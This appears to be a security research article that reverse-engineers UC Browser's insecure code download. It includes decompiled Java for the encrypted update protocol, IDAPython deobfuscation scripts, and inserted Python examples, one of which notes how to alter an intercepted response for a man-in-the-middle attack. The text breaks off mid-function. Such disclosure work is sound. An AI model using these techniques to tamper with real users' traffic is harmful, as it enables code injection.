Searching for vulnerabilities in UC Browser


Introduction

At the end of March we reported that we had found a hidden ability to download and execute unverified code in UC Browser. Today we will look in detail at how this download happens and how attackers can use it for their own purposes.

For some time UC Browser was advertised and distributed very aggressively: it was installed on users' devices by malware, distributed from various sites under the guise of video files (users thought they were downloading, for example, a video, but instead received the APK of this browser), and promoted with scary banners claiming that the user's browser was outdated, vulnerable, and so on. The official UC Browser group on VK has a thread where users can complain about unfair advertising, and there are plenty of examples there. In 2016 there was even video advertising in Russian (yes, advertising for an ad-blocking browser).

At the time of writing, UC Browser has more than 500 million installs on Google Play. That is impressive: only Google Chrome has more. Among the reviews you can see many complaints about advertising and about redirects to other applications on Google Play. That was the reason for our research: we decided to check whether UC Browser does something bad. And it turns out it does!

In the application code we found the ability to download and execute executable code, which violates the rules for publishing applications on Google Play. Beyond merely downloading executable code, UC Browser does it insecurely, which can be used to carry out a MitM attack. Let's see whether we can actually carry out such an attack.

Everything written below applies to the version of UC Browser that was available on Google Play at the time of the research:

package: com.UCMobile.intl
versionName: 12.10.8.1172
versionCode: 10598
APK file SHA1: f5edb2243413c777172f6362876041eb0c3a928c

Attack vector

In the UC Browser manifest you can find a service with the self-explanatory name com.uc.deployment.UpgradeDeployService.

    <service android:exported="false" android:name="com.uc.deployment.UpgradeDeployService" android:process=":deploy" />

When this service starts, the browser makes a POST request to puds.ucweb.com/upgrade/index.xhtml, which can be seen in traffic some time after launch. In the response it can receive a command to download an update or a new module. During our analysis the server did not issue such commands, but we noticed that when we try to open a PDF in the browser, a second request is made to the address above, after which a native library is downloaded. For the attack we decided to use this feature of UC Browser: opening PDFs relies on a native library that is not in the APK and is downloaded from the Internet when needed. Note that, in theory, UC Browser can be made to download something without any user interaction, provided you return a properly formed response to the request made right after browser launch. But that would require studying the protocol of interaction with the server in more detail, so we decided it would be easier to modify the intercepted response and substitute the library used for PDFs.

So, when a user wants to open a PDF directly in the browser, the following requests can be seen in traffic:

[screenshot]

First there is a POST request to puds.ucweb.com/upgrade/index.xhtml, then an archive with a library for viewing PDF and office documents is downloaded. It is reasonable to assume that the first request passes information about the system (at least the architecture, so that the right library can be served), and in response the browser receives information about the library to download: its address and, possibly, something else. The problem is that this request is encrypted.

Request fragment:

[screenshot]

Response fragment:

[screenshot]

The library itself is packed in a ZIP and is not encrypted.

[screenshot]

Searching for the traffic decryption code

Let's try to decrypt the server response. Look at the code of the class com.uc.deployment.UpgradeDeployService: from the onStartCommand method we go to com.uc.deployment.bx, and from there to com.uc.browser.core.dcfe:

    public final void e(l arg9) {
        int v4_5;
        String v3_1;
        byte[] v3;
        byte[] v1 = null;
        if(arg9 == null) {
            v3 = v1;
        }
        else {
            v3_1 = arg9.iGX.ipR;
            StringBuilder v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]product:");
            v4.append(arg9.iGX.ipR);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]version:");
            v4.append(arg9.iGX.iEn);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]upgrade_type:");
            v4.append(arg9.iGX.mMode);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]force_flag:");
            v4.append(arg9.iGX.iEo);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]silent_mode:");
            v4.append(arg9.iGX.iDQ);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]silent_type:");
            v4.append(arg9.iGX.iEr);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]silent_state:");
            v4.append(arg9.iGX.iEp);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]silent_file:");
            v4.append(arg9.iGX.iEq);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]apk_md5:");
            v4.append(arg9.iGX.iEl);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]download_type:");
            v4.append(arg9.mDownloadType);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]download_group:");
            v4.append(arg9.mDownloadGroup);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]download_path:");
            v4.append(arg9.iGH);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]apollo_child_version:");
            v4.append(arg9.iGX.iEx);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]apollo_series:");
            v4.append(arg9.iGX.iEw);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]apollo_cpu_arch:");
            v4.append(arg9.iGX.iEt);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]apollo_cpu_vfp3:");
            v4.append(arg9.iGX.iEv);
            v4 = new StringBuilder("[");
            v4.append(v3_1);
            v4.append("]apollo_cpu_vfp:");
            v4.append(arg9.iGX.iEu);
            ArrayList v3_2 = arg9.iGX.iEz;
            if(v3_2 != null && v3_2.size() != 0) {
                Iterator v3_3 = v3_2.iterator();
                while(v3_3.hasNext()) {
                    Object v4_1 = v3_3.next();
                    StringBuilder v5 = new StringBuilder("[");
                    v5.append(((au)v4_1).getName());
                    v5.append("]component_name:");
                    v5.append(((au)v4_1).getName());
                    v5 = new StringBuilder("[");
                    v5.append(((au)v4_1).getName());
                    v5.append("]component_ver_name:");
                    v5.append(((au)v4_1).aDA());
                    v5 = new StringBuilder("[");
                    v5.append(((au)v4_1).getName());
                    v5.append("]component_ver_code:");
                    v5.append(((au)v4_1).gBl);
                    v5 = new StringBuilder("[");
                    v5.append(((au)v4_1).getName());
                    v5.append("]component_req_type:");
                    v5.append(((au)v4_1).gBq);
                }
            }
            j v3_4 = new j();
            m.b(v3_4);
            h v4_2 = new h();
            m.b(v4_2);
            ay v5_1 = new ay();
            v3_4.hS("");
            v3_4.setImsi("");
            v3_4.hV("");
            v5_1.bPQ = v3_4;
            v5_1.bPP = v4_2;
            v5_1.yr(arg9.iGX.ipR);
            v5_1.gBF = arg9.iGX.mMode;
            v5_1.gBI = arg9.iGX.iEz;
            v3_2 = v5_1.gAr;
            c.aBh();
            v3_2.add(g.fs("os_ver", c.getRomInfo()));
            v3_2.add(g.fs("processor_arch", com.uc.b.a.a.c.getCpuArch()));
            v3_2.add(g.fs("cpu_arch", com.uc.b.a.a.c.Pb()));
            String v4_3 = com.uc.b.a.a.c.Pd();
            v3_2.add(g.fs("cpu_vfp", v4_3));
            v3_2.add(g.fs("net_type", String.valueOf(com.uc.base.system.a.Jo())));
            v3_2.add(g.fs("fromhost", arg9.iGX.iEm));
            v3_2.add(g.fs("plugin_ver", arg9.iGX.iEn));
            v3_2.add(g.fs("target_lang", arg9.iGX.iEs));
            v3_2.add(g.fs("vitamio_cpu_arch", arg9.iGX.iEt));
            v3_2.add(g.fs("vitamio_vfp", arg9.iGX.iEu));
            v3_2.add(g.fs("vitamio_vfp3", arg9.iGX.iEv));
            v3_2.add(g.fs("plugin_child_ver", arg9.iGX.iEx));
            v3_2.add(g.fs("ver_series", arg9.iGX.iEw));
            v3_2.add(g.fs("child_ver", r.aVw()));
            v3_2.add(g.fs("cur_ver_md5", arg9.iGX.iEl));
            v3_2.add(g.fs("cur_ver_signature", SystemHelper.getUCMSignature()));
            v3_2.add(g.fs("upgrade_log", i.bjt()));
            v3_2.add(g.fs("silent_install", String.valueOf(arg9.iGX.iDQ)));
            v3_2.add(g.fs("silent_state", String.valueOf(arg9.iGX.iEp)));
            v3_2.add(g.fs("silent_file", arg9.iGX.iEq));
            v3_2.add(g.fs("silent_type", String.valueOf(arg9.iGX.iEr)));
            v3_2.add(g.fs("cpu_archit", com.uc.b.a.a.c.Pc()));
            v3_2.add(g.fs("cpu_set", SystemHelper.getCpuInstruction()));
            boolean v4_4 = v4_3 == null || !v4_3.contains("neon") ? false : true;
            v3_2.add(g.fs("neon", String.valueOf(v4_4)));
            v3_2.add(g.fs("cpu_cores", String.valueOf(com.uc.b.a.a.c.Jl())));
            v3_2.add(g.fs("ram_1", String.valueOf(com.uc.b.a.a.h.Po())));
            v3_2.add(g.fs("totalram", String.valueOf(com.uc.b.a.a.h.OL())));
            c.aBh();
            v3_2.add(g.fs("rom_1", c.getRomInfo()));
            v4_5 = e.getScreenWidth();
            int v6 = e.getScreenHeight();
            StringBuilder v7 = new StringBuilder();
            v7.append(v4_5);
            v7.append("*");
            v7.append(v6);
            v3_2.add(g.fs("ss", v7.toString()));
            v3_2.add(g.fs("api_level", String.valueOf(Build$VERSION.SDK_INT)));
            v3_2.add(g.fs("uc_apk_list", SystemHelper.getUCMobileApks()));
            Iterator v4_6 = arg9.iGX.iEA.entrySet().iterator();
            while(v4_6.hasNext()) {
                Object v6_1 = v4_6.next();
                v3_2.add(g.fs(((Map$Entry)v6_1).getKey(), ((Map$Entry)v6_1).getValue()));
            }
            v3 = v5_1.toByteArray();
        }
        if(v3 == null) {
            this.iGY.iGI.a(arg9, "up_encode", "yes", "fail");
            return;
        }
        v4_5 = this.iGY.iGw ? 0x1F : 0;
        if(v3 == null) {
        }
        else {
            v3 = g.i(v4_5, v3);
            if(v3 == null) {
            }
            else {
                v1 = new byte[v3.length + 16];
                byte[] v6_2 = new byte[16];
                Arrays.fill(v6_2, 0);
                v6_2[0] = 0x5F;
                v6_2[1] = 0;
                v6_2[2] = ((byte)v4_5);
                v6_2[3] = -50;
                System.arraycopy(v6_2, 0, v1, 0, 16);
                System.arraycopy(v3, 0, v1, 16, v3.length);
            }
        }
        if(v1 == null) {
            this.iGY.iGI.a(arg9, "up_encrypt", "yes", "fail");
            return;
        }
        if(TextUtils.isEmpty(this.iGY.mUpgradeUrl)) {
            this.iGY.iGI.a(arg9, "up_url", "yes", "fail");
            return;
        }
        StringBuilder v0 = new StringBuilder("[");
        v0.append(arg9.iGX.ipR);
        v0.append("]url:");
        v0.append(this.iGY.mUpgradeUrl);
        com.uc.browser.core.d.c.i v0_1 = this.iGY.iGI;
        v3_1 = this.iGY.mUpgradeUrl;
        com.uc.base.net.e v0_2 = new com.uc.base.net.e(new com.uc.browser.core.d.c.i$a(v0_1, arg9));
        v3_1 = v3_1.contains("?") ? v3_1 + "&dataver=pb" : v3_1 + "?dataver=pb";
        n v3_5 = v0_2.uc(v3_1);
        m.b(v3_5, false);
        v3_5.setMethod("POST");
        v3_5.setBodyProvider(v1);
        v0_2.b(v3_5);
        this.iGY.iGI.a(arg9, "up_null", "yes", "success");
        this.iGY.iGI.b(arg9);
    }

Here we see the POST request being formed. Note the creation of a 16-byte array and how it is filled: 0x5F, 0, 0x1F, -50 (= 0xCE). This matches what we saw in the request above.

In the same class you can see a nested class with another interesting method:

    public final void a(l arg10, byte[] arg11) {
        f v0 = this.iGQ;
        StringBuilder v1 = new StringBuilder("[");
        v1.append(arg10.iGX.ipR);
        v1.append("]:UpgradeSuccess");
        byte[] v1_1 = null;
        if(arg11 == null) {
        }
        else if(arg11.length < 16) {
        }
        else {
            if(arg11[0] != 0x60 && arg11[3] != 0xFFFFFFD0) {
                goto label_57;
            }
            int v3 = 1;
            int v5 = arg11[1] == 1 ? 1 : 0;
            if(arg11[2] != 1 && arg11[2] != 11) {
                if(arg11[2] == 0x1F) {
                }
                else {
                    v3 = 0;
                }
            }
            byte[] v7 = new byte[arg11.length - 16];
            System.arraycopy(arg11, 16, v7, 0, v7.length);
            if(v3 != 0) {
                v7 = g.j(arg11[2], v7);
            }
            if(v7 == null) {
                goto label_57;
            }
            if(v5 != 0) {
                v1_1 = g.P(v7);
                goto label_57;
            }
            v1_1 = v7;
        }
    label_57:
        if(v1_1 == null) {
            v0.iGY.iGI.a(arg10, "up_decrypt", "yes", "fail");
            return;
        }
        q v11 = g.b(arg10, v1_1);
        if(v11 == null) {
            v0.iGY.iGI.a(arg10, "up_decode", "yes", "fail");
            return;
        }
        if(v0.iGY.iGt) {
            v0.d(arg10);
        }
        if(v0.iGY.iGo != null) {
            v0.iGY.iGo.a(0, ((o)v11));
        }
        if(v0.iGY.iGs) {
            v0.iGY.a(((o)v11));
            v0.iGY.iGI.a(v11, "up_silent", "yes", "success");
            v0.iGY.iGI.a(v11);
            return;
        }
        v0.iGY.iGI.a(v11, "up_silent", "no", "success");
    }
}

The method takes a byte array as input and checks that the zeroth byte is 0x60 or the third byte is 0xD0, and that the second byte is 1, 11 or 0x1F. Now look at the server response: the zeroth byte is 0x60, the second is 0x1F, the third is 0x60. That looks like what we need. Judging by the strings ("up_decrypt", for example), a method that decrypts the server response must be called here.
Let's move on to the method g.j. Note that its first argument is the byte at offset 2 (i.e. 0x1F in our case), and the second is the server response without the first 16 bytes.

    public static byte[] j(int arg1, byte[] arg2) {
        if(arg1 == 1) {
            arg2 = c.c(arg2, c.adu);
        }
        else if(arg1 == 11) {
            arg2 = m.aF(arg2);
        }
        else if(arg1 != 0x1F) {
        }
        else {
            arg2 = EncryptHelper.decrypt(arg2);
        }
        return arg2;
    }

Clearly, a decryption algorithm is selected here, and the byte that equals 0x1F in our case chooses one of three possible options.

We continue analyzing the code. After a couple of jumps we end up in a method with the self-explanatory name decryptBytesByKey.

Here two more bytes are split off from our response, and a string is derived from them. Clearly this is how the key for decrypting the message is selected.

    private static byte[] decryptBytesByKey(byte[] bytes) {
        byte[] v0 = null;
        if(bytes != null) {
            try {
                if(bytes.length < EncryptHelper.PREFIX_BYTES_SIZE) {
                }
                else if(bytes.length == EncryptHelper.PREFIX_BYTES_SIZE) {
                    return v0;
                }
                else {
                    byte[] prefix = new byte[EncryptHelper.PREFIX_BYTES_SIZE];  // 2 bytes
                    System.arraycopy(bytes, 0, prefix, 0, prefix.length);
                    String keyId = c.ayR().d(ByteBuffer.wrap(prefix).getShort()); // key selection
                    if(keyId == null) {
                        return v0;
                    }
                    else {
                        a v2 = EncryptHelper.ayL();
                        if(v2 == null) {
                            return v0;
                        }
                        else {
                            byte[] enrypted = new byte[bytes.length - EncryptHelper.PREFIX_BYTES_SIZE];
                            System.arraycopy(bytes, EncryptHelper.PREFIX_BYTES_SIZE, enrypted, 0, enrypted.length);
                            return v2.l(keyId, enrypted);
                        }
                    }
                }
            }
            catch(SecException v7_1) {
                EncryptHelper.handleDecryptException(((Throwable)v7_1), v7_1.getErrorCode());
                return v0;
            }
            catch(Throwable v7) {
                EncryptHelper.handleDecryptException(v7, 2);
                return v0;
            }
        }
        return v0;
    }

Looking ahead, note that at this point we have not obtained the key itself, only its "identifier". Obtaining the key is somewhat more complicated.

In the next method, two more parameters are added to the existing ones, making four in total: the magic number 16, the key identifier, the encrypted data, and an unexplained string (empty in our case).

    public final byte[] l(String keyId, byte[] encrypted) throws SecException {
        return this.ayJ().staticBinarySafeDecryptNoB64(16, keyId, encrypted, "");
    }
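As an added example (not code from UC Browser or from the original article), here is a small Python model of the framing seen so far: the 16-byte request header built in e(l), the header checks in a(l, byte[]), and the 2-byte key-identifier prefix that decryptBytesByKey() strips before handing the rest to l(). The decryption itself lives in libsgmain and is left opaque here; the frame used below is constructed for the example, not captured traffic, and what g.P() does to the plaintext is not identified on this page, so it is only reported as a flag.

```python
import struct

# Response modes accepted by a(l, byte[]) and dispatched in g.j(): 1, 11 and 0x1F.
RESPONSE_MODES = {1: "c.c(arg2, c.adu)", 11: "m.aF(arg2)", 0x1F: "EncryptHelper.decrypt(arg2)"}
PREFIX_BYTES_SIZE = 2        # EncryptHelper.PREFIX_BYTES_SIZE, length of the key-id prefix


def build_request_frame(payload, encrypted=True):
    """16-byte header from e(l): 0x5F, 0, mode, 0xCE (-50 as a signed byte), zero padding, then
    the body. mode is 0x1F when iGw is set (body passed through g.i(0x1F, ...)), else 0."""
    mode = 0x1F if encrypted else 0
    header = bytes([0x5F, 0x00, mode, 0xCE]) + bytes(12)
    return header + bytes(payload)


def parse_response_frame(frame):
    """Apply the header checks of a(l, byte[]), then the prefix split of decryptBytesByKey()
    for mode 0x1F. Returns a dict describing the frame; the ciphertext stays opaque."""
    if len(frame) < 16:
        raise ValueError("frame shorter than the 16-byte header")
    if frame[0] != 0x60 and frame[3] != 0xD0:          # arg11[0] != 0x60 && arg11[3] != (byte)0xD0
        raise ValueError("bad header magic: byte0=%#x byte3=%#x" % (frame[0], frame[3]))
    mode = frame[2]                                      # arg11[2], first argument of g.j()
    post_process = frame[1] == 1                         # arg11[1] == 1 -> g.P() after decryption
    body = frame[16:]
    info = {"mode": mode, "post_process": post_process, "encrypted": mode in RESPONSE_MODES}
    if not info["encrypted"]:
        info["body"] = body                              # used as-is, g.j() is not called
        return info
    info["decryptor"] = RESPONSE_MODES[mode]
    if mode == 0x1F:
        if len(body) <= PREFIX_BYTES_SIZE:               # decryptBytesByKey() returns null here
            raise ValueError("no ciphertext after the key-id prefix")
        # ByteBuffer.wrap(prefix).getShort(): big-endian signed 16-bit value
        (key_id,) = struct.unpack(">h", body[:PREFIX_BYTES_SIZE])
        info["key_id"] = key_id
        info["ciphertext"] = body[PREFIX_BYTES_SIZE:]
    else:
        info["ciphertext"] = body
    return info


if __name__ == "__main__":
    # Constructed sample frame, not captured traffic: magic 0x60/0xD0, g.P() flag set, mode 0x1F.
    sample = bytes([0x60, 0x01, 0x1F, 0xD0]) + bytes(12) + b"\x00\x07" + b"opaque-ciphertext"
    print(parse_response_frame(sample))
    print(build_request_frame(b"payload").hex())
```

A practical use of this model: when replaying or modifying the intercepted response, the first check that must survive is the magic (byte 0 or byte 3), and the mode byte decides whether the browser even attempts decryption, so a non-encrypted test frame is accepted only with a mode outside {1, 11, 0x1F}.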

After a series of transitions we arrive at the method staticBinarySafeDecryptNoB64 of the interface com.alibaba.wireless.security.open.staticdataencrypt.IStaticDataEncryptComponent. There are no classes in the main application code that implement this interface. Such a class does exist in the file lib/armeabi-v7a/libsgmain.so, which is not actually a .so but a jar. The method we are interested in is implemented like this:

    package com.alibaba.wireless.security.a.i;
    // ...
    public class a implements IStaticDataEncryptComponent {
        private ISecurityGuardPlugin a;
        // ...
        private byte[] a(int mode, int magicInt, int xzInt, String keyId, byte[] encrypted, String magicString) {
            return this.a.getRouter().doCommand(10601, new Object[]{Integer.valueOf(mode), Integer.valueOf(magicInt), Integer.valueOf(xzInt), keyId, encrypted, magicString});
        }
        // ...
        private byte[] b(int magicInt, String keyId, byte[] encrypted, String magicString) {
            return this.a(2, magicInt, 0, keyId, encrypted, magicString);
        }
        // ...
        public byte[] staticBinarySafeDecryptNoB64(int magicInt, String keyId, byte[] encrypted, String magicString) throws SecException {
            if(keyId != null && keyId.length() > 0 && magicInt >= 0 && magicInt < 19 && encrypted != null && encrypted.length > 0) {
                return this.b(magicInt, keyId, encrypted, magicString);
            }
            throw new SecException("", 301);
        }
        //...
    }

Two more numbers are added to our list of parameters: 2 and 0. By all appearances, 2 means decryption, just like in the doFinal method of the system class javax.crypto.Cipher. And all of this is passed to some router together with the number 10601, which appears to be a command number.

After the next chain of transitions we find a class that implements the IRouterComponent interface and its doCommand method:

    package com.alibaba.wireless.security.mainplugin;
    import com.alibaba.wireless.security.framework.IRouterComponent;
    import com.taobao.wireless.security.adapter.JNICLibrary;
    public class a implements IRouterComponent {
        public a() {
            super();
        }
        public Object doCommand(int arg2, Object[] arg3) {
            return JNICLibrary.doCommandNative(arg2, arg3);
        }
    }

And also the JNICLibrary class, in which the native method doCommandNative is declared:

    package com.taobao.wireless.security.adapter;
    public class JNICLibrary {
        public static native Object doCommandNative(int arg0, Object[] arg1);
    }

So we need to find the doCommandNative method in native code. And this is where the fun begins.

Machine code obfuscation

The file libsgmain.so (which is really a .jar, and in which we found the implementations of some encryption-related interfaces above) contains one native library: libsgmainso-6.4.36.so. We open it in IDA and get a pile of error dialogs. The problem is that the section header table is invalid. This is done deliberately to complicate analysis.

[screenshot]

But it is not needed: to load and analyze an ELF file correctly, the program header table is enough. So we simply remove the section table by zeroing the corresponding fields in the ELF header.

[screenshot]

Open the file in IDA again.

There are two ways to tell the Java virtual machine where exactly in a native library the implementation of a method declared native in Java code is located. The first is to give the function a name of the form Java_package_name_ClassName_MethodName.

The second is to register it when the library is loaded (in the JNI_OnLoad function) by calling the RegisterNatives function.

In our case, if the first approach were used, the name would have to be Java_com_taobao_wireless_security_adapter_JNICLibrary_doCommandNative.

There is no such function among the exported functions, so we have to look for a RegisterNatives call.
Let's go to the JNI_OnLoad function and see this picture:

[screenshot]

What is going on here? At first glance, the beginning and end of the function are typical for the ARM architecture. The first instruction pushes onto the stack the registers the function will use (here R0, R1 and R2) together with the LR register, which holds the function's return address. The last instruction restores the saved registers, and the return address is placed directly into the PC register, which returns from the function. But if you look closely, you will notice that the penultimate instruction changes the return address stored on the stack. Let's work out what it will be after the code runs. Some address 0xB130 is loaded into R1, 5 is subtracted from it, then it is moved to R0 and 0x10 is added to it. The result is 0xB13B. So IDA thinks the last instruction is an ordinary function return, but in fact it jumps to the computed address 0xB13B.

It is worth recalling here that ARM processors have two modes and two instruction sets: ARM and Thumb. The least significant bit of a branch address tells the processor which instruction set is in use. That is, the address is actually 0xB13A, and the 1 in the least significant bit indicates Thumb mode.

A similar "adapter", plus some junk code, is added at the beginning of every function in this library. We will not dwell on them further; just keep in mind that the real beginning of almost every function is some distance away.

Since nothing jumps explicitly to 0xB13A, IDA did not recognize that there is code at this location. For the same reason it does not recognize most of the code in the library as code at all, which makes analysis somewhat harder. We tell IDA that this is code, and here is what happens:

[screenshot]

A table clearly begins at 0xB144. What is in sub_494C?

[screenshot]

When this function is called, the LR register holds the address of the table mentioned earlier (0xB144), and R0 holds an index into that table. So a value is taken from the table, added to LR, and the result is the address to jump to. Let's try to calculate it: 0xB144 + [0xB144 + 8*4] = 0xB144 + 0x120 = 0xB264. We go to that address and indeed see a few useful instructions, followed by another jump to 0xB140:

[screenshot]

This time the jump uses the table entry at index 0x20.

Judging by the size of the table, there will be a lot of such jumps in the code. The question is whether this can be handled more automatically, without computing addresses by hand. Scripting and IDA's ability to patch code come to our aid:

    from idc import *   # IDAPython: here(), get_wide_word(), get_operand_type(), patch_word(), ...

    def put_unconditional_branch(source, destination):
        # Thumb unconditional branch: 16-bit B (encoding T2) when the halfword offset fits in
        # 11 bits, otherwise the 32-bit B.W (encoding T4) with J1 = J2 = 1.
        offset = (destination - source - 4) >> 1
        if offset > 2097151 or offset < -2097152:
            raise RuntimeError("Invalid offset")
        if offset > 1023 or offset < -1024:
            instruction1 = 0xf000 | ((offset >> 11) & 0x7ff)
            instruction2 = 0xb800 | (offset & 0x7ff)
            patch_word(source, instruction1)
            patch_word(source + 2, instruction2)
        else:
            instruction = 0xe000 | (offset & 0x7ff)
            patch_word(source, instruction)

    ea = here()
    if get_wide_word(ea) == 0xb503:  # PUSH {R0,R1,LR}
        ea1 = ea + 2
        if get_wide_word(ea1) == 0xbf00:  # NOP
            ea1 += 2
        # MOVS R0, #index
        if get_operand_type(ea1, 0) == 1 and get_operand_value(ea1, 0) == 0 and get_operand_type(ea1, 1) == 2:
            index = get_wide_dword(get_operand_value(ea1, 1))
            print("index =", hex(index))
            ea1 += 2
            # BL sub_494C: the table starts right after the call, so LR points to it
            if get_operand_type(ea1, 0) == 7:
                table = get_operand_value(ea1, 0) + 4
            elif get_operand_type(ea1, 1) == 2:
                table = get_operand_value(ea1, 1) + 4
            else:
                print("Wrong operand type on", hex(ea1), "-", get_operand_type(ea1, 0), get_operand_type(ea1, 1))
                table = None
            if table is None:
                print("Unable to find table")
            else:
                print("table =", hex(table))
                offset = get_wide_dword(table + (index << 2))
                put_unconditional_branch(ea, table + offset)
        else:
            print("Unknown code", get_operand_type(ea1, 0), get_operand_value(ea1, 0), get_operand_type(ea1, 1) == 2)
    else:
        print("Unable to detect first instruction")

Put the cursor on the line at 0xB26A, run the script, and see the jump to 0xB4B0:

[screenshot]

IDA did not recognize this location as a procedure. We help it, and see another pattern there:

[screenshot]

The instructions after the BLX do not look very meaningful; they look more like some kind of offset. Let's look at sub_4964:

[screenshot]

And indeed: a dword is taken from the address in LR and added to that address, then the value at the resulting address is loaded and pushed onto the stack. In addition, 4 is added to LR so that this offset is skipped after the function returns. After that, POP {R1} takes the value off the stack. If you look at what lies at address 0xB4BA + 0xEA = 0xB5A4, you will see something resembling an address table:

[screenshot]

To patch this construction you need to extract two parameters from the code: the offset, and the number of the register the result should be placed in. For each possible register, a piece of code has to be prepared in advance.

    from idc import *   # IDAPython (Python 3 API: get_bytes() returns bytes)

    # Replacement sequences: NOP; LDR Rn, =literal; LDR Rn, [Rn]; B over the literal.
    # R0-R5 use 16-bit encodings (8 bytes), R8-R11 need 32-bit LDR.W forms (12 bytes).
    patches = {}
    patches[0] = (0x00, 0xbf, 0x01, 0x48, 0x00, 0x68, 0x02, 0xe0)
    patches[1] = (0x00, 0xbf, 0x01, 0x49, 0x09, 0x68, 0x02, 0xe0)
    patches[2] = (0x00, 0xbf, 0x01, 0x4a, 0x12, 0x68, 0x02, 0xe0)
    patches[3] = (0x00, 0xbf, 0x01, 0x4b, 0x1b, 0x68, 0x02, 0xe0)
    patches[4] = (0x00, 0xbf, 0x01, 0x4c, 0x24, 0x68, 0x02, 0xe0)
    patches[5] = (0x00, 0xbf, 0x01, 0x4d, 0x2d, 0x68, 0x02, 0xe0)
    patches[8] = (0x00, 0xbf, 0xdf, 0xf8, 0x06, 0x80, 0xd8, 0xf8, 0x00, 0x80, 0x01, 0xe0)
    patches[9] = (0x00, 0xbf, 0xdf, 0xf8, 0x06, 0x90, 0xd9, 0xf8, 0x00, 0x90, 0x01, 0xe0)
    patches[10] = (0x00, 0xbf, 0xdf, 0xf8, 0x06, 0xa0, 0xda, 0xf8, 0x00, 0xa0, 0x01, 0xe0)
    patches[11] = (0x00, 0xbf, 0xdf, 0xf8, 0x06, 0xb0, 0xdb, 0xf8, 0x00, 0xb0, 0x01, 0xe0)

    ea = here()
    if (get_wide_word(ea) == 0xb082  # SUB SP, SP, #8
            and get_wide_word(ea + 2) == 0xb503):  # PUSH {R0,R1,LR}
        if get_operand_type(ea + 4, 0) == 7:  # BLX sub_4964
            pop = get_bytes(ea + 12, 4, 0)
            if pop[1] == 0xbc:  # 16-bit POP {Rn}: 0xBC00 | (1 << n)
                register = -1
                r = get_wide_byte(ea + 12)
                for i in range(8):
                    if r == (1 << i):
                        register = i
                        break
                if register == -1:
                    print("Unable to detect register")
                else:
                    address = get_wide_dword(ea + 8) + ea + 8  # offset after the BLX, relative to LR
                    for b in patches[register]:
                        patch_byte(ea, b)
                        ea += 1
                    if ea % 4 != 0:  # the literal must be 4-byte aligned for the PC-relative LDR
                        ea += 2
                    patch_dword(ea, address)
            elif pop[:3] == b'\x5d\xf8\x04':  # 32-bit LDR.W Rn, [SP], #4 (POP of a high register)
                register = pop[3] >> 4
                if register in patches:
                    address = get_wide_dword(ea + 8) + ea + 8
                    for b in patches[register]:
                        patch_byte(ea, b)
                        ea += 1
                    patch_dword(ea, address)
            else:
                print("POP instruction not found")
        else:
            print("Wrong operand type on +4:", get_operand_type(ea + 4, 0))
    else:
        print("Unable to detect first instructions")
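The two scripts above hand-encode Thumb branches and carry a table of pre-built patch bytes. The following Python is an added example, not part of the original article: it implements the Thumb/Thumb-2 encodings the scripts rely on (B encoding T2, B.W encoding T4 with the S/J1/J2 sign handling, and the 16-bit and 32-bit LDR forms), decodes the branches back so the encoder can be checked, and regenerates the `patches` table instead of typing it in. It runs outside IDA; the generator is slightly more general than the table on the page, since it also produces entries for R6 and R7, which the article never needed. The addresses used in the demo are the ones from the text (0xB26A to 0xB4B0).

```python
"""Thumb/Thumb-2 encoding helpers behind the IDA deobfuscation scripts (added example)."""


def encode_thumb_branch(source, destination):
    """Bytes of an unconditional branch at `source` to `destination` (Thumb addresses without
    the low mode bit). 16-bit B (T2) when the halfword offset fits in 11 bits, else 32-bit
    B.W (T4). Same arithmetic as put_unconditional_branch() in the IDA scripts."""
    offset = (destination - source - 4) >> 1          # halfwords relative to PC (= source + 4)
    if not -2097152 <= offset <= 2097151:
        raise ValueError("offset %d halfwords is out of B.W range" % offset)
    if -1024 <= offset <= 1023:
        return (0xE000 | (offset & 0x7FF)).to_bytes(2, "little")
    hw1 = 0xF000 | ((offset >> 11) & 0x7FF)           # 11110 S imm10: bit 10 is S (the sign)
    hw2 = 0xB800 | (offset & 0x7FF)                   # 10 J1 1 J2 imm11 with J1 = J2 = 1
    return hw1.to_bytes(2, "little") + hw2.to_bytes(2, "little")


def decode_thumb_branch(source, code):
    """Target of a B / B.W at `source`, following the ARM ARM rule for T4:
    I1 = NOT(J1 XOR S), I2 = NOT(J2 XOR S), imm32 = SignExtend(S:I1:I2:imm10:imm11:0)."""
    hw1 = int.from_bytes(code[:2], "little")
    if (hw1 & 0xF800) == 0xE000:                      # T2: 11100 imm11
        imm = hw1 & 0x7FF
        if imm & 0x400:
            imm -= 0x800
        return source + 4 + 2 * imm
    if (hw1 & 0xF800) != 0xF000:
        raise ValueError("not a Thumb B/B.W instruction")
    hw2 = int.from_bytes(code[2:4], "little")
    s = (hw1 >> 10) & 1
    j1, j2 = (hw2 >> 13) & 1, (hw2 >> 11) & 1
    i1, i2 = 1 - (j1 ^ s), 1 - (j2 ^ s)
    imm = (s << 23) | (i1 << 22) | (i2 << 21) | ((hw1 & 0x3FF) << 11) | (hw2 & 0x7FF)
    if s:
        imm -= 1 << 24                                # sign-extend the 24-bit halfword count
    return source + 4 + 2 * imm


def thumb_patch_load_deref(reg):
    """Regenerate patches[reg] from the second script: NOP; LDR Rn, =literal; LDR Rn, [Rn];
    B over the literal. R0-R7 use 16-bit encodings; R8-R11 need LDR.W (encodings T2/T3)."""
    nop = (0xBF00).to_bytes(2, "little")
    if reg < 8:
        ldr_lit = (0x4800 | (reg << 8) | 1).to_bytes(2, "little")      # LDR Rn, [PC, #4]
        ldr_reg = (0x6800 | (reg << 3) | reg).to_bytes(2, "little")    # LDR Rn, [Rn]
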